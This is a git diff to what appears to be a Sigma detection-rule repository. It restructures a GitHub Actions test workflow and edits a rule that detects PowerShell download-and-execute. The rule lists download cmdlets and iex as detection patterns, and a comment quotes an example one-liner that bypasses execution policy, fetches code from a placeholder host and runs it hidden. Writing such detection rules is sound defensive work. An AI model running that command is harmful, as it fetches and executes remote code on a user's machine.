diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml index 6c9a20e2d..41f87ec68 100644 --- a/.github/workflows/sigma-test.yml +++ b/.github/workflows/sigma-test.yml @@ -47,6 +47,8 @@ jobs: - uses: actions/checkout@v4 - name: yaml-lint uses: ibiqlik/action-yamllint@v3 + with: + strict: true # fail on warnings as well test-sigma-logsource: runs-on: ubuntu-latest @@ -64,9 +66,28 @@ jobs: pip install PyYAML colorama python tests/test_logsource.py - test-sigma: + test-sigma-legacy: runs-on: ubuntu-latest - needs: test-sigma-logsource + needs: yamllint + steps: + - uses: actions/checkout@v4 + with: + submodules: true + - name: Set up Python 3.11 + uses: actions/setup-python@v5 + with: + python-version: 3.11 + - name: Install dependencies + run: | + pip install PyYAML colorama + - name: Test Sigma Rules + run: | + pip install PyYAML colorama + python tests/test_rules.py + + sigma-check: + runs-on: ubuntu-latest + needs: yamllint steps: - uses: actions/checkout@v4 with: @@ -83,7 +104,3 @@ jobs: - name: Test Sigma Rule Syntax run: | sigma check --fail-on-error --fail-on-issues --validation-config tests/sigma_cli_conf.yml rules* - - name: Test Sigma Rules - run: | - pip install PyYAML colorama - python tests/test_rules.py diff --git a/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml b/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml index 119a8e737..ebc66ab7b 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml @@ -22,7 +22,7 @@ detection: - 'Invoke-WebRequest ' - 'iwr ' - 'Invoke-RestMethod ' - - 'irm ' #powershell -ep bypass -w h -c irm test.domain/ffe | iex + - 'irm ' # powershell -ep bypass -w h -c irm test.domain/ffe | iex selection_iex: CommandLine|contains: - ';iex $'